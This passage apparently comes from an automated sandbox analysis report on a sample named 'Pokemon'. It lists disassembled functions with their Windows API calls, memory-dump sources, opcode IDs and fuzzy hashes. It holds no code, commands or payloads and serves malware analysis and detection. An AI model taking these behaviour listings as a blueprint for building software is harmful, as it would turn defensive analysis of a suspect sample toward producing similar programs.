                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d652f108510e5252fb2f9c92764eef613a10f3d61b2c4a06478d7ad6231863d9
                                                                                                                                                                                                                                                                                      • Instruction ID: e0cc81b91684eb185501db67799e9644561569cb2a9669f15428465c7b3ea148
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d652f108510e5252fb2f9c92764eef613a10f3d61b2c4a06478d7ad6231863d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF51D631600318AADF70AB64D889B7DB3E5EF45310F248446EA06DF697DB709C40EBA2
                                                                                                                                                                                                                                                                                      Function 00109B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00109F2A
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00109F4B
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00109F72
                                                                                                                                                                                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00109FCA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                                                                      • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                      • Opcode ID: eb0c5709286390a5450d08fee06c71abc5046b4a36184d42491340766d018ee4
                                                                                                                                                                                                                                                                                      • Instruction ID: 884d5e0a47422fbdc2d30c00a8500a0c35ff885fadc50634deaf14694536aa1e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb0c5709286390a5450d08fee06c71abc5046b4a36184d42491340766d018ee4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EE194719043419FDB24EF24C891EAAB7E0BF85314F04896DF8899B2A3DB71DD45CB92
                                                                                                                                                                                                                                                                                      Function 00106ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00106F21
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0010707E
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00130CC4,00000000,00000001,00130B34,?), ref: 00107095
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00107319
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                      • Opcode ID: b1e200e4c7bef2b66b3cc4c9ab3c5f24635ceedaa356af4ef9246b52e2998773
                                                                                                                                                                                                                                                                                      • Instruction ID: 462448671047e15f4a2a4b8fce178d2f2da01656a44d71d085646d696c6d6378
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e200e4c7bef2b66b3cc4c9ab3c5f24635ceedaa356af4ef9246b52e2998773
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53D16771508301AFD700EF24C8819ABB7E8FF99704F40896DF5959B2A2EB71ED05CB92
                                                                                                                                                                                                                                                                                      Function 00091B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?,?), ref: 00091B35
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00091B99
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00091BB6
                                                                                                                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00091BC7
                                                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00091C15
                                                                                                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000D3287
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091C2D: BeginPath.GDI32(00000000), ref: 00091C4B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d5330cbb62af136cfc513457df7c9ed3be917c6961e37552a9a380d9d4707bc8
                                                                                                                                                                                                                                                                                      • Instruction ID: 439cc62325b9fa57bcb334e3d5700b2d174fa864fd46335f08640793325eaac0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5330cbb62af136cfc513457df7c9ed3be917c6961e37552a9a380d9d4707bc8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E41D470605701AFDB20DF24DC85FFA7BE8EF45324F140669F964872A1C7709985EB62
                                                                                                                                                                                                                                                                                      Function 00101196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 001011B3
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001011EE
                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0010120A
                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00101283
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0010129A
                                                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 001012C8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 29d9cff3ac7d621d822edfd9b9f6cf512e1b34f8f80505b3221a64769ef5c085
                                                                                                                                                                                                                                                                                      • Instruction ID: fcc57696b5bc6343bdce5c798515a47a582bd322d0dca283e7fb92ad042455dd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29d9cff3ac7d621d822edfd9b9f6cf512e1b34f8f80505b3221a64769ef5c085
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18416D71900204FFDF04DF58DC85AAAB7B8FF04310F1484A5ED00AA296D774DEA1DBA4
                                                                                                                                                                                                                                                                                      Function 00128C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,000EFBEF,00000000,?,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 00128CA7
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00128CCD
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00128D2C
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00128D40
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00128D66
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00128D8A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 02fdec7d8aaf305827434991c38544ba48900ccc2d0feb6cdb7ba7bfe676c632
                                                                                                                                                                                                                                                                                      • Instruction ID: a8522037eeeedd32bb3828025df6aeb0775c413c0cf46c100fffebb327aec146
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02fdec7d8aaf305827434991c38544ba48900ccc2d0feb6cdb7ba7bfe676c632
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6641B730603664AFEB35DF24F889BE17BF1FB45308F184065E5085B6A2CB7168B6CB50
                                                                                                                                                                                                                                                                                      Function 00112D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00112D45
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010EF33: GetWindowRect.USER32(?,?), ref: 0010EF4B
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00112D6F
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00112D76
                                                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00112DB2
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00112DDE
                                                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00112E3C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0b18ed35bcd55d8547c7563ff7c71bce476e3902a10c87ee7c42dfce445c35da
                                                                                                                                                                                                                                                                                      • Instruction ID: 2766d5183f7e4de1a5dca2c49306d3f648f7b9150423eb28656b0d91fd760e6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b18ed35bcd55d8547c7563ff7c71bce476e3902a10c87ee7c42dfce445c35da
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91312272505316AFCB24DF54E845FABB7A9FF84314F000929F48897181CB70E9A9CBD2
                                                                                                                                                                                                                                                                                      Function 000F55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 000F55F9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000F5616
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000F564E
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F566C
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000F5674
                                                                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 000F567E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cba5242f36da5c8ae08fce4ddcadf9463948990e83123d35cbacf26f3126b699
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d79929e83299245b6f0c8aff00def3c6c8ffef1b792c3d2f3308d039811bd63
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cba5242f36da5c8ae08fce4ddcadf9463948990e83123d35cbacf26f3126b699
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E02126722046087BEB255B28EC49EBF7BE8DF44711F148039FA05DB492EE74CD41A660
                                                                                                                                                                                                                                                                                      Function 00106263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001062C0
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 001063DA
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00130CC4,00000000,00000001,00130B34,?), ref: 001063F3
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00106411
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                      • Opcode ID: a4bafdd9a0d004100495594f861a1bff2c6b6e40f034ed013d1f957e4337e10c
                                                                                                                                                                                                                                                                                      • Instruction ID: 816540a18a85fc6e4630409a25ca3d4c2a6c3e0d69c6c44c05cef87d138da227
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4bafdd9a0d004100495594f861a1bff2c6b6e40f034ed013d1f957e4337e10c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96D14275A043019FCB14DF24C494A6ABBE5FF89714F14885CF8899B3A2CB72EC45CB92
                                                                                                                                                                                                                                                                                      Function 001286FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00128740
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00128765
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0012877D
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 001287A6
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0010C1F2,00000000), ref: 001287C6
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 001287B1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d56474bb4f89a132a7d63d4cd5a86295da8efafda7ad611b0bc07d9756688154
                                                                                                                                                                                                                                                                                      • Instruction ID: 7bdf4c9e6ef03a236a3afac2f487c036a639b44a7d32b50f69906c8eca3dfc77
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d56474bb4f89a132a7d63d4cd5a86295da8efafda7ad611b0bc07d9756688154
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B321A471612261AFCB245F38EC08A6A37A5EB84325F354629F926C35F0EF7088A1CB10
                                                                                                                                                                                                                                                                                      Function 000B36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000B36E9,000B3355), ref: 000B3700
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000B370E
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000B3727
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,000B36E9,000B3355), ref: 000B3779
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 10b65954ea97c89957689c161f1c97dbc0893fee31a0ed7b70163481a38ad176
                                                                                                                                                                                                                                                                                      • Instruction ID: 8efa6d3d5f068290360471b49d27e933dcd065d2eb2e7fcf1fc039988b5c55e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10b65954ea97c89957689c161f1c97dbc0893fee31a0ed7b70163481a38ad176
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC0124B268E311BEA77427B4FCC66EB2AD4EB047727300229F010444F2EF514D825240
                                                                                                                                                                                                                                                                                      Function 000C30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000B4D53,00000000,?,?,000B68E2,?,?,00000000), ref: 000C30EB
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C311E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3146
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 000C3153
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 000C315F
                                                                                                                                                                                                                                                                                      • _abort.LIBCMT ref: 000C3165
                                                                                                                                                                                                                                                                                      Memory Dump Source
